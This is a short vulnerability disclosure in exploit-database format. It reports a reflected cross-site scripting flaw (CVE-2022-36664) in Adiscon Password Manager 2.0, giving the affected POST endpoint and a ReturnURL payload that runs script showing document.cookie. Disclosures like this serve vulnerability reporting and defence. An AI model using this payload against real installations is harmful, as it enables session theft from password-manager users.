# Exploit Title: *XSS*
# Exploit Author: *VP4TR10T*
# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/
<http://passwordmanager.adiscon.com/en/manual/>
*# Software Link:*http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
*# Version: *Version 2.0
*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664

*Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1

HTTP Payload (Affected Parameter ):
ReturnURL=<script>alert(document.cookie)</script>

*Cordially,*